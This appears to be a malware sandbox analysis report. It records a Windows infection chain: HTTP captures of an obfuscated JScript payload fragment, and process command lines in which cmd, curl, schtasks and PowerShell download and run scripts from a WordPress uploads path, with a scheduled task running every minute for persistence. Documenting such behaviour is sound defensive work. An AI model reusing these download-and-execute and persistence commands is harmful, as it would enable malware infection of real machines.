                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                  Host: admiralpub.ca
                  Connection: Keep-Alive
                  2024-03-28 17:11:47 UTC  208                IN         HTTP/1.1 200 OK
                  Date: Thu, 28 Mar 2024 17:11:47 GMT
                  Server: Apache
                  Upgrade: h2,h2c
                  Connection: Upgrade, close
                  Vary: Accept-Encoding
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8
                  2024-03-28 17:11:47 UTC  1094               IN         Data Raw: 34 33 66 0d 0a 76 61 72 20 66 31 3d 22 53 63 72 22 2c 66 32 3d 22 69 6e 67 2e 46 69 22 2c 66 33 3d 22 73 74 65 6d 4f 62 22 0d 0a 76 61 72 20 66 73 6f 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 66 31 2b 22 69 70 74 22 2b 66 32 2b 22 6c 65 53 79 22 2b 66 33 2b 22 6a 65 63 74 22 29 3b 0d 0a 76 61 72 20 77 31 3d 22 57 53 63 22 2c 77 32 3d 22 72 69 50 74 22 2c 77 34 3d 22 65 4c 6c 22 0d 0a 76 61 72 20 77 73 68 3d 77 31 2b 77 32 2b 22 2e 73 48 22 2b 77 34 0d 0a 76 61 72 20 62 62 6a 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 77 73 68 29 0d 0a 76 61 72 20 66 6c 64 72 3d 47 65 74 4f 62 6a 65 63 74 28 22 77 69 6e 6d 67 6d 74 73 3a 72 6f 6f 74 5c 5c 63 69 6d 76 32 3a 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 3d 27 63 70 75 30 27
                  Data Ascii (chunk size line, then the chunk body, line breaks restored from the 0d 0a bytes above; the capture is truncated after the first 1094 bytes):
                  43f
                  var f1="Scr",f2="ing.Fi",f3="stemOb"
                  var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject");
                  var w1="WSc",w2="riPt",w4="eLl"
                  var wsh=w1+w2+".sH"+w4
                  var bbj=new ActiveXObject(wsh)
                  var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'
                  2024-03-28 17:11:47 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  2           192.168.2.5  49716        103.26.141.28   443               2952  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2024-03-28 17:12:03 UTC  203                OUT        GET /wp-content/uploads/2017/oligophosphaturia.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                  Host: admiralpub.ca
                  Connection: Keep-Alive
                  2024-03-28 17:12:04 UTC  208                IN         HTTP/1.1 200 OK
                  Date: Thu, 28 Mar 2024 17:12:04 GMT
                  Server: Apache
                  Upgrade: h2,h2c
                  Connection: Upgrade, close
                  Vary: Accept-Encoding
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8
                  2024-03-28 17:12:04 UTC  1094               IN         Data Raw: 34 33 66 0d 0a 76 61 72 20 66 31 3d 22 53 63 72 22 2c 66 32 3d 22 69 6e 67 2e 46 69 22 2c 66 33 3d 22 73 74 65 6d 4f 62 22 0d 0a 76 61 72 20 66 73 6f 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 66 31 2b 22 69 70 74 22 2b 66 32 2b 22 6c 65 53 79 22 2b 66 33 2b 22 6a 65 63 74 22 29 3b 0d 0a 76 61 72 20 77 31 3d 22 57 53 63 22 2c 77 32 3d 22 72 69 50 74 22 2c 77 34 3d 22 65 4c 6c 22 0d 0a 76 61 72 20 77 73 68 3d 77 31 2b 77 32 2b 22 2e 73 48 22 2b 77 34 0d 0a 76 61 72 20 62 62 6a 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 77 73 68 29 0d 0a 76 61 72 20 66 6c 64 72 3d 47 65 74 4f 62 6a 65 63 74 28 22 77 69 6e 6d 67 6d 74 73 3a 72 6f 6f 74 5c 5c 63 69 6d 76 32 3a 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 3d 27 63 70 75 30 27
                  Data Ascii (chunk size line, then the chunk body, line breaks restored from the 0d 0a bytes above; the capture is truncated after the first 1094 bytes):
                  43f
                  var f1="Scr",f2="ing.Fi",f3="stemOb"
                  var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject");
                  var w1="WSc",w2="riPt",w4="eLl"
                  var wsh=w1+w2+".sH"+w4
                  var bbj=new ActiveXObject(wsh)
                  var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'
                  2024-03-28 17:12:04 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  3           192.168.2.5  49719        103.26.141.28   443               7084  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2024-03-28 17:13:02 UTC  203                OUT        GET /wp-content/uploads/2017/oligophosphaturia.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                  Host: admiralpub.ca
                  Connection: Keep-Alive
                  2024-03-28 17:13:03 UTC  208                IN         HTTP/1.1 200 OK
                  Date: Thu, 28 Mar 2024 17:13:03 GMT
                  Server: Apache
                  Upgrade: h2,h2c
                  Connection: Upgrade, close
                  Vary: Accept-Encoding
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8
                  2024-03-28 17:13:03 UTC  1094               IN         Data Raw: 34 33 66 0d 0a 76 61 72 20 66 31 3d 22 53 63 72 22 2c 66 32 3d 22 69 6e 67 2e 46 69 22 2c 66 33 3d 22 73 74 65 6d 4f 62 22 0d 0a 76 61 72 20 66 73 6f 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 66 31 2b 22 69 70 74 22 2b 66 32 2b 22 6c 65 53 79 22 2b 66 33 2b 22 6a 65 63 74 22 29 3b 0d 0a 76 61 72 20 77 31 3d 22 57 53 63 22 2c 77 32 3d 22 72 69 50 74 22 2c 77 34 3d 22 65 4c 6c 22 0d 0a 76 61 72 20 77 73 68 3d 77 31 2b 77 32 2b 22 2e 73 48 22 2b 77 34 0d 0a 76 61 72 20 62 62 6a 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 77 73 68 29 0d 0a 76 61 72 20 66 6c 64 72 3d 47 65 74 4f 62 6a 65 63 74 28 22 77 69 6e 6d 67 6d 74 73 3a 72 6f 6f 74 5c 5c 63 69 6d 76 32 3a 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 3d 27 63 70 75 30 27
                  Data Ascii (chunk size line, then the chunk body, line breaks restored from the 0d 0a bytes above; the capture is truncated after the first 1094 bytes):
                  43f
                  var f1="Scr",f2="ing.Fi",f3="stemOb"
                  var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject");
                  var w1="WSc",w2="riPt",w4="eLl"
                  var wsh=w1+w2+".sH"+w4
                  var bbj=new ActiveXObject(wsh)
                  var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'
                  2024-03-28 17:13:03 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Target ID:0
                  Start time:18:11:40
                  Start date:28/03/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\cmd.exe" /c curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" & schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1
                  Imagebase:0x7ff6d33e0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:1
                  Start time:18:11:40
                  Start date:28/03/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:2
                  Start time:18:11:40
                  Start date:28/03/2024
                  Path:C:\Windows\System32\curl.exe
                  Wow64 process (32bit):false
                  Commandline:curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php"
                  Imagebase:0x7ff65f170000
                  File size:530'944 bytes
                  MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:4
                  Start time:18:11:41
                  Start date:28/03/2024
                  Path:C:\Windows\System32\schtasks.exe
                  Wow64 process (32bit):false
                  Commandline:schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1
                  Imagebase:0x7ff7eb350000
                  File size:235'008 bytes
                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:5
                  Start time:18:11:43
                  Start date:28/03/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat"" qWQnYbiCKtrx1y2
                  Imagebase:0x7ff6d33e0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:6
                  Start time:18:11:43
                  Start date:28/03/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:7
                  Start time:18:11:43
                  Start date:28/03/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"
                  Imagebase:0x7ff7be880000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:8
                  Start time:18:11:43
                  Start date:28/03/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:9
                  Start time:18:11:46
                  Start date:28/03/2024
                  Path:C:\Windows\System32\schtasks.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f
                  Imagebase:0x7ff7eb350000
                  File size:235'008 bytes
                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:10
                  Start time:18:11:46
                  Start date:28/03/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js
                  Imagebase:0x7ff78aec0000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:12
                  Start time:18:12:01
                  Start date:28/03/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat"" qWQnYbiCKtrx1y2
                  Imagebase:0x7ff6d33e0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:13
                  Start time:18:12:01
                  Start date:28/03/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:14
                  Start time:18:12:01
                  Start date:28/03/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"
                  Imagebase:0x7ff7be880000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:15
                  Start time:18:12:01
                  Start date:28/03/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:16
                  Start time:18:12:02
                  Start date:28/03/2024
                  Path:C:\Windows\System32\schtasks.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f
                  Imagebase:0x7ff7eb350000
                  File size: 235'008 bytes
                  MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
                  Has elevated privileges: false
                  Has administrator privileges: false
                  Programmed in: C, C++ or other language
                  Has exited: true

                  Target ID: 17
                  Start time: 18:12:02
                  Start date: 28/03/2024
                  Path: C:\Windows\System32\wscript.exe
                  Wow64 process (32bit): false
                  Commandline: "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js
                  Imagebase: 0x7ff78aec0000
                  File size: 170'496 bytes
                  MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges: false
                  Has administrator privileges: false
                  Programmed in: C, C++ or other language
                  Has exited: true

                  Target ID: 19
                  Start time: 18:13:00
                  Start date: 28/03/2024
                  Path: C:\Windows\System32\cmd.exe
                  Wow64 process (32bit): false
                  Commandline: C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat"" qWQnYbiCKtrx1y2
                  Imagebase: 0x7ff6d33e0000
                  File size: 289'792 bytes
                  MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges: false
                  Has administrator privileges: false
                  Programmed in: C, C++ or other language
                  Has exited: true

                  Target ID: 20
                  Start time: 18:13:00
                  Start date: 28/03/2024
                  Path: C:\Windows\System32\conhost.exe
                  Wow64 process (32bit): false
                  Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase: 0x7ff6d64d0000
                  File size: 862'208 bytes
                  MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges: false
                  Has administrator privileges: false
                  Programmed in: C, C++ or other language
                  Has exited: true

                  Target ID: 21
                  Start time: 18:13:00
                  Start date: 28/03/2024
                  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit): false
                  Commandline: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"
                  Imagebase: 0x7ff7be880000
                  File size: 452'608 bytes
                  MD5 hash: 04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges: false
                  Has administrator privileges: false
                  Programmed in: C, C++ or other language
                  Has exited: true

                  Target ID: 22
                  Start time: 18:13:00
                  Start date: 28/03/2024
                  Path: C:\Windows\System32\conhost.exe
                  Wow64 process (32bit): false
                  Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase: 0x7ff6d64d0000
                  File size: 862'208 bytes
                  MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges: false
                  Has administrator privileges: false
                  Programmed in: C, C++ or other language
                  Has exited: true

                  Target ID: 23
                  Start time: 18:13:01
                  Start date: 28/03/2024
                  Path: C:\Windows\System32\schtasks.exe
                  Wow64 process (32bit): false
                  Commandline: "C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f
                  Imagebase: 0x7ff7eb350000
                  File size: 235'008 bytes
                  MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
                  Has elevated privileges: false
                  Has administrator privileges: false
                  Programmed in: C, C++ or other language
                  Has exited: true

                  Target ID: 24
                  Start time: 18:13:02
                  Start date: 28/03/2024
                  Path: C:\Windows\System32\wscript.exe
                  Wow64 process (32bit): false
                  Commandline: "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js
                  Imagebase: 0x7ff78aec0000
                  File size: 170'496 bytes
                  MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges: false
                  Has administrator privileges: false
                  Programmed in: C, C++ or other language
                  Has exited: true
                    Memory Dump Source
                    • Source File: 00000007.00000002.2057772336.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7ff848f10000_powershell.jbxd